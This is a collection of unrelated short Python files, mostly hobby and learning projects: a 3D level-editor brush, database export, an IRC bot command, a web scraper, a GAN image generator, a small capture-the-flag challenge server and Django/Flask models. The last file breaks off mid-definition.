from panda3d.core import Point3
from .BaseBrush import BaseBrush
from .controls.NumericControl import NumericControl
from bsp.leveleditor import LEUtils
import math
class CylinderBrush(BaseBrush):
Name = "Cylinder"
def __init__(self):
BaseBrush.__init__(self)
self.numSides = self.addControl(NumericControl(self, "Number of sides", val = 8))
def create(self, generator, mins, maxs, material, roundDecimals, temp = False):
numSides = self.numSides.getValue()
if numSides < 3:
return []
# Cylinders can be elliptical so use both major and minor rather than just the radius
# NOTE: when a low number (< 10ish) of faces are selected this will cause the cylinder to not touch all edges of the box.
width = maxs.x - mins.x
length = maxs.y - mins.y
height = maxs.z - mins.z
center = (mins + maxs) / 2
major = width / 2
minor = length / 2
angle = 2 * math.pi / numSides
# Calculate the X and Y points for the ellipse
points = []
for i in range(numSides):
a = i * angle
xval = center.x + major * math.cos(a)
yval = center.y + minor * math.sin(a)
zval = mins.z
points.append(LEUtils.roundVector(Point3(xval, yval, zval), roundDecimals))
faces = []
z = LEUtils.roundVector(Point3(0, 0, height), roundDecimals)
for i in range(numSides):
next = (i + 1) % numSides
faces.append([points[i], points[i] + z, points[next] + z, points[next]])
# Add the elliptical top and bottom faces
faces.append(points)
faces.append([x + z for x in reversed(points)])
solid = self.makeSolid(generator, faces, material, temp)
return [solid]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 26 16:34:49 2018
@author: Rajesh Arumugam
"""
# used cx_oracle library
# https://pypi.python.org/pypi/cx_Oracle
# Connect to Oracle DB,retrive data and create csv file
import cx_Oracle
import pandas as pd
# DB connection Details
USERNAME = 'username'
PASSWORD = 'password'
IP = "ipaddress"
PORT = "1521"
service_name="DBSERVICENAME"
# Function in retrive the Values
def dbquery(query):
# Create Connection using CX_Oracle
dsn_tns = cx_Oracle.makedsn(IP, PORT, service_name=service_name)
connection = cx_Oracle.connect(USERNAME, PASSWORD, dsn_tns)
# Use connection, retrive the data using Pandas read_sql_query and save it in the dataframe (df)
with connection:
try:
df = pd.read_sql_query(query,connection)
except cx_Oracle.DatabaseError as dberror:
print(dberror)
return df
def Validate():
# Enter the Query
JenkinsidQuery="""select * from table_name"""
# Call dbquery function to retrive the data
sqlreturnvaluedf=dbquery(JenkinsidQuery)
#Fill NA for empty columns in each row
query_by_Jenkinsid=sqlreturnvaluedf.fillna('NA')
#Generate CSV File
query_by_Jenkinsid.to_csv('SampleFileName.csv')
# Call the Validate method
Validate()
|
#!/usr/bin/env python3
# coding=utf-8
import os
import argparse
import matplotlib.pyplot as plt
import numpy as np
#如果要增加新的测试模块请在下面的modules后面添加一个名称
#注意:程序输出测试结果的顺序一定要和下面的名称顺序一样!!
#如果模块数量大于colors列表中颜色个数,请在colors中添加一个
#新的颜色,各种颜色名称请参考 https://matplotlib.org/3.1.0/gallery/color/named_colors.html
#添加成功后请在当前目录下运行(make完成后)
#python run_and_draw.py
modules = ["ompp", "reload", "remove", "allpipe", "pipe_1", "dlt"]
colors = ["blue", "orange", "green", "red", "purple",
"brown", "pink", "gray", "olive", "cyan"]
module_data = {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Stencil测试脚本\n运行样例 python run_and_draw.py --n 1000 --N 21000 --interval 1000 --T 10000",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"--n",
default = 10000,
type = int,
help = "问题规模大小N的最小值,即从N等于多少开始测试, 默认从1000开始"
)
parser.add_argument(
"--N",
default = 80000,
type = int,
help = "问题规模大小N的最大值,即测N一直到多少为止, 默认直到20000"
)
parser.add_argument(
"--interval",
default = 5000,
type = int,
help = "从n-N,间隔多少测一次,默认为1000, 即1000, 2000, 3000......20000"
)
parser.add_argument(
"--T",
default = 5000,
type = int,
help = "Stencil运行的时间步长,默认为10000步"
)
args = parser.parse_args()
for module in modules:
module_data[module] = []
for i in range(args.n, args.N, args.interval):
result = os.popen("./exe_1d3p {} {} 5000 1".format(i, args.T))
res = result.read()
moduel_index = 0
for line in res.splitlines():
if "=" not in line:
continue
line = line.split("=")
module_data[modules[moduel_index]].append(float(line[1]))
moduel_index = moduel_index + 1
assert(len(modules) < len(colors))
x = np.arange(args.n, args.N, args.interval)
color_index = 0
lines = []
for module in modules:
line, = plt.plot(x, module_data[module], color = colors[color_index])
lines.append(line)
color_index = color_index + 1
plt.legend(lines, modules, loc = "upper right")
plt.xlabel("N")
plt.ylabel("Stencil/s")
plt.savefig("result.png")
plt.show()
|
word = raw_input("Enter: ")
word = None
|
import z
stocks = z.getp("listofstocks")
start = False
allowed = ["A", "B", "C"]
for astock in stocks:
if astock[0] not in allowed:
continue
# if astock == "BRKB":
# start = True
# if not start:
# continue
try:
path = z.getPath("split/{}/{}_2019.csv".format(astock[0], astock))
with open(path, "r") as f:
lines = f.readlines()
with open(path, "w") as f:
prevline = None
for aline in lines:
date = aline.split(',')[0]
if date != prevline:
f.write(aline)
prevline = date
except:
print("path : {}".format( path ))
pass
|
from mod_base import*
class GiveOP(Command):
"""Give OPs to yourself (default), or a list of nicks, or everyone (with '*')."""
def run(self, win, user, data, caller=None):
args = Args(data)
if "*" in args:
users = win.GetUsers() # FIXME: drop unneccesary nicks
win.GiveUserModes(users,IRC_MODE_OP)
else:
if data == None:
win.GiveUserModes([user],IRC_MODE_OP)
else:
users = []
for arg in args:
user = self.bot.FindUser(arg)
if user == False:continue
if win.HasUser(user):users.append(user)
if users != []:
win.GiveUserModes(users,IRC_MODE_OP)
else:
win.Send("invalid nicks")
module = {
"class": GiveOP,
"type": MOD_COMMAND,
"level": 2,
"zone":IRC_ZONE_BOTH,
} |
from Student import Student
def readStudentList():
studentList = []
ln = input("What is the last name of the first person?")
while(len(ln) > 0):
fn = input("What is their first name?")
grades = input("What are the grades -- input on one line")
s = Student(ln, fn)
s.addGrades(grades)
studentList.append(s)
ln = input("What is the last name of the next person?")
return studentList
def printStudentList(studentList):
for s in studentList:
print(s)
def main():
myStudentList = readStudentList()
myStudentList.sort(key=Student.getAverage, reverse = True)
printStudentList(myStudentList)
main() |
from flask_restful import Resource, abort, reqparse
from controllers import checkSend
from flask import request
class Main(Resource):
def get(self):
return 'Mail backup running'
class sendMail(Resource):
def get(self):
return 'Email sending details are displayed here'
def post(self):
data = request.json
# return (data['code'])
return checkSend(data['code'])
|
# By Zhufyak V.V
# zhufyakvv@gmail.com
# github.com/zhufyakvv
# 27.02.2017
Asterisk = "*"
class AsteriskPattern:
def __init__(self, pattern):
self.pattern = pattern
self.split = pattern.split(Asterisk)
self.text = ""
self.result = []
def init(self, pattern):
self.pattern = pattern
self.split = pattern.split(Asterisk)
def check(self, word):
"""
Checks if word is similar to pattern
:param word: string
:return: bool of similarity
"""
# If first is not asterisk
if self.split[0] != '' and word.find(self.split[0]) != 0:
return False
else:
# current var here is for faster and correct find function
current = 0
for i in range(0, len(self.split)):
current = word.find(self.split[i], current)
if current < 0:
return False
current += len(self.split[i])
if self.split[i] != '' and self.split[i] != word[len(word) - len(self.split[i]):]:
return False
else:
return True
def file(self, filename):
file = open(filename, "r+")
text = file.read()
self.init(text.split("\n")[0])
result = []
# Split and check
self.text = text.split("\n")[1]
for i in self.text.split(" "):
if self.check(i):
result.append(i)
file.close()
self.result = []
self.result.append(result.copy())
result.sort(key=len, reverse=False)
self.result.append(result)
# Open same file
file = open(filename, "a+")
file.write(str(self.result[0]) + "\n")
file.write(str(self.result[1]) + "\n")
|
import socket, threading, sys, os
from datetime import datetime
from constants import *
from time import sleep
import gansta_eye
class ClientThread(threading.Thread):
def __init__(self, client_socket, cleint_ip, client_port):
threading.Thread.__init__(self)
self.ip = cleint_ip
self.port = client_port
self.client_socket = client_socket
self.client_socket.settimeout(socket_timeout)
self.id = str(datetime.now()).replace(":", "-").replace(".", "-").replace(" ", "-")
self.dead = False
print "#::New thread started for ({0}, ({1}))".format(str(cleint_ip), str(client_port))
def validate_video(self, video_file, letter):
print "#:: Let's check u..."
return gansta_eye.detectIt(video_file, letter)
def run(self):
print "#{}::Listening for requests.".format(self.id)
target_string = "1NDVCLUB"
validated = 0
for letter in target_string:
print "#::Server is expecting", letter
letter_video = None
video_created = False
client_bytes = "CamStudio"
bytes_received = 0
print "#::Ready to receive..."
while len(client_bytes):
try:
client_bytes = self.client_socket.recv(input_chunk_size)
bytes_received += len(client_bytes)
if bytes_received > max_size_bytes:
raise Exception("#::Too long video. Ain't u a cop?")
if client_bytes and client_bytes != "JustALilByte":
if not video_created: #lazy here
letter_video = open("video_{0}_{1}.avi".format(letter, self.id), 'wb')
video_created = True
letter_video.write(client_bytes)
letter_video.flush()
print "-",
else:
print
if video_created:
print "#::Shiip, it seems your video is over."
letter_video.flush()
letter_video.close()
print "#::video_{0}_{1} is saved.".format(letter, self.id)
else:
print "#::Nothin' from u nothin' from me, baby."
break
except Exception as some_error:
print "#{0}::ERROR({1})".format(self.id, str(some_error))
break
if letter_video is not None:
filename = "video_{0}_{1}.avi".format(letter, self.id)
if self.validate_video(filename, letter):
print "#::Cool, br0!"
validated += 1
os.remove(filename)
print "#::I have removed all da evidence, my little homie. Relax for a while and keep pushin'!"
sleep(pause)
else:
print "#::U've made a mistake. VIP zone ain't for u."
os.remove(filename)
print "#::I do not need your video now, d0ll. I have thrown it away."
break
else:
print "#::No video - no deal. Get out from our hood."
break
if validated == len(target_string):
print "#::Now you are in our club, man. Take your gun."
try:
flag_file = open(".\\test_folder\\flag.txt", "r")
flag = flag_file.readline()
flag_file.close()
print flag
self.client_socket.send(flag)
print "#::Use it as a real gangsta."
except Exception as error:
print "#::Worse for you, baby.", error
else:
print "See ya."
self.client_socket.close()
self.dead = True
return
def main():
out = sys.stdout
host = hosts
port = server_port
server_socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((host, port))
client_threads = []
server_socket.listen(max_users)
while True:
try:
print "\n~~~Listening for incoming connections...(online:" + str(len(client_threads))+ ")\n"
(new_client_socket, (client_ip, client_port)) = server_socket.accept()
client_thread = ClientThread(new_client_socket, client_ip, client_port)
client_thread.start()
client_threads.append(client_thread)
for thread in client_threads:
if thread.dead:
client_threads.remove(thread)
except:
print "~~~About to break..."
break
server_socket.close()
sys.stdout = out
print "~~~PROGRAM OVER"
main() |
import numpy as np
import kero.utils.utils as ut
import param_estimate as pe
import matplotlib.pyplot as plt
from scipy.integrate import RK45
import csv
import pickle
es = pe.DE_param_estimator()
print("----------------- Load Data -------------------------------")
Xr, Yr = pe.load_data(plot_data=0)
x0 = np.array([Yr[0]])
t_set_expt = [np.array([x]) for x in Xr]
n_set_expt = [np.array([x]) for x in Yr]
print("x0 = ",x0)
print("Xr[:5] = ",Xr[:5])
print("Yr[:5] = ",Yr[:5])
print("t_set_expt[:5] = ",t_set_expt[:5])
print("n_set_expt[:5] = ",n_set_expt[:5])
#.#
print("----------------- Prepare Model ---------------------------")
# MODEL used to fit this data
#
# We are estimating the parameters of the following differential equations:
# dn/dt = F(n, p) = G - k1 * n - k2 * n**2 - k3 * n**3
# where p is the parameter (G,k1,k2,k3)
def F(y,p):
return p[0] - p[1] * y -p[2] * y**2 - p[3] * y**3
diff_part_G = lambda x: 1
diff_part_k1 = lambda x: -x
diff_part_k2 = lambda x: -x**2
diff_part_k3 = lambda x: -x**3
list_of_derivatives = [diff_part_G, diff_part_k1, diff_part_k2, diff_part_k3]
print(" Model prepared.")
#.#
do_initial_testing = 1
if do_initial_testing:
print("---------------- Prepare Initial guess --------------------")
# Before optimizing, try playing around the p_init values here
# We will choose the range of uniform random values for guess p based on tests conducted here
# Write down choices that seem good and any remarks here
#
# 1. p_init = [0,5e-2,2e-3,1.1e-7] # near the real value. all n less than expt data
# 2. p_init = [0,5e-2,1e-3,1.1e-7] # seems to be better than 1
# 3. p_init = [0,5e-2,0,1.1e-7] # all n above expt data
# 4. p_init = [0,1e-1,1e-4,1.1e-7] # small n above expt data, larger n below
# 5. p_init = [0,1e-2,1e-3,1.1e-7] # exceedingly close! Let's vary around these values instead
#
#
#
collection_of_p_init =[
[0,1e-3,0.5e-3,1.2e-7], # guess 1
[0,1e-2,0,1e-7], # guess 2
[0,0,1.5e-3,1e-7], # guess 3
]
fig = plt.figure()
ax = fig.add_subplot(111)
no_of_test = len(collection_of_p_init)
for i in range(no_of_test):
p_init = collection_of_p_init[i] # guess p
time_checkpoints = t_set_expt
def f(t,y):
return np.array([F(y[0],p_init)])
_,_, x_checkpoint, t_checkpoint_new = pe.RK45_wrapper(x0, time_checkpoints, f, stepsize=None)
ax.plot(t_checkpoint_new,x_checkpoint, label="guess "+str(i+1), color=(0,1-1*(i+1)/no_of_test,1*(i+1)/no_of_test))
# To find what is the best learning_rate
print(" testing initial guess parameters: ",i+1)
es.update_p(t_set_expt, n_set_expt, F, p_init, list_of_derivatives, verbose=11)
ax.plot(Xr,Yr, color = "r", label="expt values")
ax.legend( )
ax.set_xlabel("t")
ax.set_ylabel("n")
plt.show()
#.#
# ------------------------------------------------------------------------------- #
start_op = 0
if start_op:
print("----------------- Start Optimizing ---------------------------")
# ********* Settings *************
p_init_max = [1e-10,0 ,0,0.9e-7] # [Gmax,k1max,k2max,k3max]
p_init_min = [1e-10, 2e-2,2e-3,1.2e-7] # [Gmin ,k1min,k2min,k3min]
no_of_tries = 3
save_name = 'fitting_data'
es.learning_rate= 1e-16
no_of_iterations = 10
save_interval = 1
# ********************************
n_set_expt_MAT = pe.RK45_output_to_list(n_set_expt) # MATRIX list form
for j in range(no_of_tries):
p_init = []
for a,b in zip(p_init_min, p_init_max):
p_init.append(np.random.uniform(a,b))
p_now= p_init
save_count = 0
SAVE_DATA = []
print("TRY ", j+1," / ",no_of_tries)
mse_list = []
for i in range(no_of_iterations + 1):
if i>0:
# for i =0 , initial state, do not iterate yet
p_now = es.update_p(t_set_expt, n_set_expt, F, p_now, list_of_derivatives, verbose=0)
#------------------------ FOR REALTIME OBSERVATION -----------
def f(t,y):
return np.array([F(y[0],p_now)])
time_checkpoints = t_set_expt
_,_, n_set_next, t_set_next = pe.RK45_wrapper(x0, time_checkpoints, f, stepsize=None)
n_set_next_MAT = pe.RK45_output_to_list(n_set_next)
mse = pe.MSE(n_set_next_MAT,n_set_expt_MAT)
mse_list.append(mse)
print(" i = ", i , " -- > mse = ", mse)
# print(" p_new = ", p_now)
#------------------------ TO BE SAVED -------------------------
save_count = save_count + 1
if save_count == save_interval or i==0:
save_count = 0
data_store = {
"t_set":t_set_next,
"n_set":n_set_next,
"p":p_now,
"learning_rate":es.learning_rate,
"mse_list": mse_list
}
SAVE_DATA.append(data_store)
output = open(save_name+"_"+ str(j+1) +".par", 'wb')
pickle.dump(SAVE_DATA, output)
output.close()
print("\nClosing Program...") |
from rest_framework import serializers
from rest_framework.permissions import IsAuthenticated
from django.db import models
from Nursery_API.models import Users, Nursery, UserPlant, NurseryPlant
from django.contrib.auth import authenticate
from django.contrib.auth.hashers import make_password
# Register serializer
class RegisterUserSerializer(serializers.ModelSerializer):
class Meta:
model = Users
fields = ('__all__')
extra_kwargs = {
'password': {'write_only': True},
}
# User serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = Users
fields = ('first_name', 'last_name', 'age')
class RegisterNurserySerializer(serializers.ModelSerializer):
class Meta:
model = Nursery
fields = '__all__'
extra_kwargs = {
'password': {'write_only': True},
}
# User serializer
class NurserySerializer(serializers.ModelSerializer):
class Meta:
model = Nursery
fields = ('name', 'location')
|
#!/usr/bin/python3
# variables.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
d = {
'one':1,
'two':2,
'three':3,
'four':4,
'five':5
}
newD = dict(
one = 1, two = 2, three = 3, four = 4, five = 5
)
newD['seven']=7
print(d)
#sorted method sorts the values of a dictionary
#so they just don't go out in an unorganized manner
for k in sorted(d.keys()):
print(k, d[k])
if __name__ == "__main__": main()
|
from RPLCD import i2c
from time import *
import subprocess, os, geturl
lcdmode = 'i2c'
cols = 16
rows = 2
charmap = 'A00'
i2c_expander = 'PCF8574'
address = 0x27
port = 1
lcd = i2c.CharLCD(i2c_expander, address, port=port, charmap=charmap,cols=cols,rows=rows)
lcd.backlight_enabled = True
lcd.write_string(subprocess.run(['hostname', '-I'],stdout = subprocess.PIPE).stdout.decode('utf-8')[:10])
lcd.write_string(" ")
lcd.write_string(geturl.getDec())
#sleep(5)
#lcd.backlight_enabled = False
#lcd.close(clear=True)
|
#!/usr/bin/env python
import logging
import mylib
# see : https://docs.python.org/2/howto/logging.html#logging-from-multiple-modules
logger = logging.getLogger(__name__)
def main():
# logging.basicConfig(filename='myapp.log', level=logging.INFO)
logging.basicConfig(level=logging.INFO)
logging.getLogger().setLevel(logging.CRITICAL)
logger.setLevel(logging.WARN)
logging.warn('inside myapp: Started %s', __file__)
mylib.do_something()
logging.warn('inside myapp: Finished %s', __file__)
logger.warn('inside myapp: testing __name__{}'.format(__name__))
if __name__ == '__main__':
main()
|
import json
import logging
import nltk
import string
from pathlib import Path
from gensim import corpora, models, similarities
from gensim.models import TfidfModel
from nltk.stem.lancaster import LancasterStemmer
from definitions import TRAIN_SAMPLE_CODE, OUTPUT_DIR, TFIDF_DIR
from nltk.corpus import stopwords
# 预处理数据
def preprocess(courses):
# # 小写化
# texts_lower = [[word for word in document.lower().split()] for document in courses]
# 分词
texts_tokenized = [[word.lower() for word in nltk.word_tokenize(document)] for document in courses]
# 去停用词
english_stopwords = stopwords.words('english')
texts_filtered_stopwords = [[word for word in document if not word in english_stopwords] for document in
texts_tokenized]
# 去标点符号
texts_filtered = [[word for word in document if not word in string.punctuation] for document in
texts_filtered_stopwords]
# 词干化
st = LancasterStemmer()
texts = [[st.stem(word) for word in docment] for docment in texts_filtered]
return texts
# 训练TF-IDF模型
def trian_tfidf(descriptions):
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
dictionary = corpora.Dictionary(descriptions)
corpus = [dictionary.doc2bow(description) for description in descriptions]
tfidf = models.TfidfModel(corpus)
index = similarities.MatrixSimilarity(tfidf[corpus])
# index = similarities.Similarity(querypath, corpus_tfidf, len(dictionary))
# tfidf_dir = Path(TFIDF_DIR)
# tfidf_dir.mkdir(exist_ok=True, parents=True)
tfidf.save('./output/test/tfidf.model')
dictionary.save('./output/test/tfidf_dictionary.dict')
index.save('./output/test/tfidf_index.index')
def remove_duplicate_code(sample_codes, descriptions):
Threshold = 0.9
dictionary = corpora.Dictionary.load('./output/test/tfidf_dictionary.dict')
index = similarities.Similarity.load('./output/test/tfidf_index.index')
tfidf = TfidfModel.load('./output/test/tfidf.model')
remove_code_index = []
print(len(descriptions))
for i in range(len(descriptions)):
vec_bow = dictionary.doc2bow(descriptions[i])
vec_tfidf = tfidf[vec_bow]
sims = index[vec_tfidf]
sort_sims = sorted(enumerate(sims), key=lambda item: -item[1])
for j in range(len(sort_sims)):
if sort_sims[j][1] < Threshold:
break
else:
if sample_codes[i]['API'] == sample_codes[sort_sims[j][0]]['API'] and i != sort_sims[j][0]:
if abs(70-len(sample_codes[i]['Description'].strip().split(' '))) < abs(70-len(sample_codes[sort_sims[j][0]]['Description'].strip().split(' '))):
# vec_bow1 = dictionary.doc2bow([sample_codes[i]['Code']])
# vec_tfidf1 = tfidf[vec_bow1]
# sims1 = index[vec_tfidf1]
#
# vec_bow2 = dictionary.doc2bow([sample_codes[sort_sims[j][0]]['Code']])
# vec_tfidf2 = tfidf[vec_bow2]
# sims2 = index[vec_tfidf2]
# if sims1[i] > sims2[sort_sims[j][0]]:
# if tfidf.similarity(sample_codes[i]['Code'], sample_codes[i]['Description']) > tfidf.similarity(sample_codes[sort_sims[j][0]]['Code'], sample_codes[sort_sims[j][0]]['Description']):
remove_code_index.append(sort_sims[j][0])
else:
remove_code_index.append(i)
print(i)
sample_codes_index = [i for i in range(len(sample_codes))]
sample_codes_index = set(sample_codes_index)
remove_code_index = set(remove_code_index)
index = list(sample_codes_index - remove_code_index)
sample_codes = [sample_codes[i] for i in index]
# 将全限定名,样例代码,文本描述保存
save_file = []
save_path = "RemoveDuplicateSampleCode.json"
for sample_code in sample_codes:
json_save = {}
json_save['API'] = sample_code['API']
json_save['Code'] = sample_code['Code']
json_save['Description'] = sample_code['Description']
save_file.append(json_save)
with open(OUTPUT_DIR + '/' + save_path, 'w', encoding='utf-8') as json_file:
json.dump(save_file, json_file, indent=4)
if __name__ == "__main__":
descriptions = []
with open(TRAIN_SAMPLE_CODE) as f:
sample_codes = json.load(f)
for sample_code in sample_codes:
descriptions.append(sample_code['Description'])
f.close()
preprocess_descriptions = preprocess(descriptions)
# trian_tfidf(preprocess_descriptions)
remove_duplicate_code(sample_codes, preprocess_descriptions)
|
from datetime import datetime
from app.main import db
class UpdateForm(db.Model):
"""Namings as in Odoo.
"""
__tablename__ = "update_form"
form_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
form_status = db.Column(db.String(100))
name = db.Column(db.String(100)) # full name in ukrainian
birth_date = db.Column(db.Date())
image_1920 = db.Column(db.String(500000)) # Odoo saves image as base64 encoded string, f*cking large str
# email = db.Column(db.String(100)) # Do not allow to update email here, because we use email for login
contact_country = db.Column(db.String(100)) # selection field
contact_city = db.Column(db.String(100))
mobile = db.Column(db.String(15))
skype = db.Column(db.String(100))
telegram = db.Column(db.String(100))
viber = db.Column(db.String(100))
facebook_link = db.Column(db.String(100))
linkedin_link = db.Column(db.String(100))
diploma_naukma = db.Column(db.Boolean)
bachelor_degree = db.Column(db.Boolean())
bachelor_faculty = db.Column(db.String(100)) # selection field
bachelor_speciality = db.Column(db.String(100)) # selection field
bachelor_year_in = db.Column(db.String(100)) # selection field
bachelor_year_out = db.Column(db.String(100)) # selection field
master_degree = db.Column(db.Boolean())
master_faculty = db.Column(db.String(100)) # selection field
master_speciality = db.Column(db.String(100)) # selection field
master_year_in = db.Column(db.String(100)) # selection field
master_year_out = db.Column(db.String(100)) # selection field
parent_id = db.Column(db.Integer) # company id in Odoo, many2one field in Odoo
company_name = db.Column(db.String(100))
function = db.Column(db.String(100)) # job position
# foreign keys
alumni_id = db.Column(db.Integer, db.ForeignKey('alumni.alumni_id', onupdate="CASCADE",
ondelete="NO ACTION"), nullable=False)
alumni = db.relationship("Alumni", back_populates="update_form")
operator_id = db.Column(db.Integer, db.ForeignKey('operator.operator_id', onupdate="CASCADE",
ondelete="NO ACTION"), nullable=True)
operator = db.relationship("Operator", back_populates="update_form")
def __init__(self, name, birth_date, image_1920, contact_country, contact_city, mobile, skype,
telegram, viber, facebook_link, linkedin_link, diploma_naukma, bachelor_degree, bachelor_faculty, bachelor_speciality,
bachelor_year_in, bachelor_year_out, master_degree, master_faculty, master_speciality,
master_year_in, master_year_out, parent_id, company_name, function, alumni_id, operator_id):
self.form_status = 'new' # TODO: create enum for the form statuses
self.name = name
self.birth_date = datetime.strptime(birth_date, '%Y-%m-%d').date()
self.image_1920 = image_1920
self.contact_country = contact_country
self.contact_city = contact_city
self.mobile = mobile
self.skype = skype
self.telegram = telegram
self.viber = viber
self.facebook_link = facebook_link
self.linkedin_link = linkedin_link
self.diploma_naukma = diploma_naukma
self.bachelor_degree = bachelor_degree
self.bachelor_faculty = bachelor_faculty
self.bachelor_speciality = bachelor_speciality
self.bachelor_year_in = bachelor_year_in
self.bachelor_year_out = bachelor_year_out
self.master_degree = master_degree
self.master_faculty = master_faculty
self.master_speciality = master_speciality
self.master_year_in = master_year_in
self.master_year_out = master_year_out
self.parent_id = parent_id
self.company_name = company_name
self.function = function
self.alumni_id = alumni_id
self.operator_id = operator_id
def update(self, data):
for key, item in data.items():
if hasattr(self, key):
setattr(self, key, item)
db.session.commit()
|
import torch
from torchvision.utils import save_image
import os
import utils
import WGAN_split
from tqdm import tqdm
from argparse import ArgumentParser
def get_label(test_file):
with open(test_file, 'r') as file:
file.readline()
file.readline()
label = []
for line in file:
line = line.split()
label.append([int(l) for l in line])
return label
def generate_images(model, label, output_dir, device):
#torch.manual_seed(42)
all_tag = torch.FloatTensor(label).to(device)
#z = torch.randn(1, 100).to(device)
# tag = all_tag[:64,:]
# output_img = model(z, tag)
# save_image(utils.denorm(output_img), './test.png', nrow=16)
for i in tqdm(range(len(label))):
z = torch.randn(1, 100).to(device)
tag = all_tag[i].unsqueeze(0)
output = model(z, tag)
save_image(utils.denorm(output),
os.path.join(output_dir, '{}.png'.format(i)))
def main():
parser = ArgumentParser()
parser.add_argument('--test_file', type=str,
help='testing label file')
parser.add_argument('--model', type=str,
help='pretrained generator model')
parser.add_argument('--output_dir', type=str,
help='output images dir')
parser.add_argument('--device', type=str, default='cuda:0',
help='The device you want to run this code')
args = parser.parse_args()
label = get_label(args.test_file)
G = WGAN_split.Generator(latent_dim=100, class_dim=15)
checkpoint = torch.load(args.model)
G.load_state_dict(checkpoint['model'])
G.to(args.device)
G = G.eval()
generate_images(G, label, args.output_dir, args.device)
if __name__ == '__main__':
main()
|
import dash_bootstrap_components as dbc
from dash import html
from .util import make_subheading
list_group = html.Div(
[
make_subheading("ListGroup", "list_group"),
dbc.ListGroup(
[
dbc.ListGroupItem("No color applied"),
dbc.ListGroupItem("The primary item", color="primary"),
dbc.ListGroupItem("A secondary item", color="secondary"),
dbc.ListGroupItem("A successful item", color="success"),
dbc.ListGroupItem("A warning item", color="warning"),
dbc.ListGroupItem("A dangerous item", color="danger"),
dbc.ListGroupItem("An informative item", color="info"),
dbc.ListGroupItem("A light item", color="light"),
dbc.ListGroupItem("A dark item", color="dark"),
dbc.ListGroupItem("An action item", action=True),
dbc.ListGroupItem("An active item", active=True),
dbc.ListGroupItem(
[
html.H5("Item 4 heading"),
html.P("Item 4 text"),
]
),
]
),
],
className="mb-4",
)
|
n = float(input('Preço do produto: R$'))
d = n*5/100
f = n - d
print('Com 5% de desconto esse produto fica por R${:.2f}'.format(f)) |
import requests
from bs4 import BeautifulSoup
import lxml
import re
import datetime
import pandas as pd
def CarGrDataParser_New(urllink):
html_text = requests.get(urllink)
soup = BeautifulSoup(html_text.content, "html.parser")
# regular expression to pick up kilometers
re1 = re.compile("(\d{1,3}\.\d{3}|\d{1,3})")
# regular expression to pick up date
re2 = re.compile("\d{2}/\d{4}")
Brand = []; Price = []; Date = []; EngVol = []; EngPow = []; Fuel = []; Mileage = []; Gear = []
# find all the tags that contain car data
results = soup.find_all("div", class_="row p-2 position-relative no-gutters")
for result in results:
Brand.append(result.find("div", class_="title font-size-xl title").text.split()[0]) # brand)
price = result.find("span", class_="price-no-decimals").text # price
price = int(price.replace('.',''))
Price.append(price)
date = result.find("span", class_="key-feature", title="Χρονολογία") # date
if date:
date_num = datetime.datetime.strptime(re2.findall(date.text)[0], '%m/%Y')
else:
date_num = 'n/a'
Date.append(date_num)
enginecc = result.find("span", class_="key-feature", title="Κυβικά")
if enginecc:
enginecc = enginecc.text
enginecc = re.findall(r'\b\d+\b',enginecc)
engVol = int(enginecc[0])*1000 + int(enginecc[1])
engPow = int(enginecc[2])
else:
engVol = 'n/a'
engPow = 'n/a'
EngVol.append(engVol)
EngPow.append(engPow)
fuel = result.find("span", class_="key-feature", title="Καύσιμο")
if fuel:
fuel = re.findall('\w+',fuel.text)
else:
fuel = 'n/a'
Fuel.append(fuel)
km = result.find("span", class_="key-feature", title="Χιλιόμετρα")
if km:
km = re1.search(km.text).group(1)
km_num = int(km.replace('.',''))
else:
km_num = 'n/a'
Mileage.append(km_num)
gear = result.find("span", class_="key-feature", title="Σασμάν")
if gear:
gear = True
else:
gear = False
Gear.append(gear)
return {"brand":Brand,
"price":Price,
"kilometers":Mileage,
"engine_cc":EngVol,
"engine_bhp":EngPow,
"date":Date,
"fuel":Fuel,
"gear":Gear}
CarData = {"brand":[],
"price":[],
"kilometers":[],
"engine_cc":[],
"engine_bhp":[],
"date":[],
"fuel":[],
"gear":[]}
# loop through pages of available ads. I got 21 'cause there's currently 22 pages available. May be different. In a later version, I will just 'click' the 'Next Page' button.
for ppp in range(0,21):
PageNum = ppp + 1;
urllink = "https://www.car.gr/classifieds/cars/?category=11&condition=used&doors=4-5&engine_size-from=%3E1000&fromfeed=1&fuel_type=1&fuel_type=8&mileage-to=%3C200000&pg="+ "%d"%PageNum +"&price-from=%3E8000&price-to=%3C25000®istration-from=%3E2015&rg=2"
#html_text = requests.get(urllink)
CarDataTemp = CarGrDataParser_New(urllink)
CarData['brand'].extend(CarDataTemp['brand'])
CarData['price'].extend(CarDataTemp['price'])
CarData['kilometers'].extend(CarDataTemp['kilometers'])
CarData['engine_cc'].extend(CarDataTemp['engine_cc'])
CarData['engine_bhp'].extend(CarDataTemp['engine_bhp'])
CarData['date'].extend(CarDataTemp['date'])
CarData['fuel'].extend(CarDataTemp['fuel'])
CarData['gear'].extend(CarDataTemp['gear'])
df = pd.DataFrame(CarData)
df.to_csv(path_or_buf="CarGr_data.csv", encoding='utf-8-sig') # this encoding preserves some texts in Greek
|
address = "부산광역시 수영구 민락동"
si = address[:5]
goo = address[6:9]
dong = address[-3:]
print("시 : ",si,", 구 : ",goo,", 동 : ",dong)
|
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin, UnicodeUsernameValidator, UserManager
from django.contrib.contenttypes.models import ContentType
from django.core.mail import send_mail
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
import uuid
from django.core.validators import MinLengthValidator, RegexValidator, MinValueValidator, MaxValueValidator
from kagipos.errors import CustomError
class User(AbstractBaseUser, PermissionsMixin):
"""
An abstract base class implementing a fully featured User model with
admin-compliant permissions.
Username and password are required. Other fields are optional.
"""
username_validator = UnicodeUsernameValidator()
username = models.CharField(
verbose_name=_('username'),
max_length=150,
unique=True,
